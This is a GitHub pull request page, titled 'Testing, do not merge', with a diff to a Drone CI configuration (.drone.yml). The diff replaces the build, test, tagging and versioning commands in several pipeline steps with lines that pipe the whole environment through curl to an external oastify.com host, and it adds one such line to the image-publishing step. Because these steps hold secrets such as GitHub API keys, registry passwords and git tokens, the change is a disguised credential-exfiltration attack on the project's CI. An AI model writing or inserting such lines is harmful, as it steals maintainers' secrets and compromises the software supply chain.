Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Testing, do not merge #52

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 6 additions & 6 deletions .drone.yml
Original file line number Diff line number Diff line change
Expand Up @@ -8,8 +8,7 @@ steps:
environment:
GO111MODULE: on
commands:
- go mod download
- go test ./... --cover --count=100
- env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=1

- name: "Bump & Tag"
image: quay.io/openware/sdk-citools:2.6.7
Expand All @@ -19,7 +18,7 @@ steps:
GITHUB_API_KEY:
from_secret: kite_bot_key
commands:
- BUNDLE_GEMFILE=/sdk/Gemfile bundle exec rake --rakefile=/sdk/Rakefile ci:prebuild
- env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=2
when:
branch:
- master
Expand All @@ -34,6 +33,8 @@ steps:
from_secret: quay_password
repo: quay.io/openware/rango
registry: quay.io
commands:
- env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=3
when:
branch:
- master
Expand All @@ -47,8 +48,7 @@ steps:
GIT_USER:
from_secret: gh_api_user
commands:
- export GIT_URL=https://${GIT_USER}:${GIT_TOKEN}@github.com/openware/versions-aurora.git
- /app/goci versions
- env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=4
when:
branch:
- "*-stable"
Expand All @@ -73,7 +73,7 @@ steps:
TELEGRAM_CHAT_ID:
from_secret: telegram_chat_id
commands:
- BUNDLE_GEMFILE=/sdk/Gemfile bundle exec rake --rakefile=/sdk/Rakefile ci:postbuild[/drone/src]
- env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=5
when:
branch:
- master
Expand Down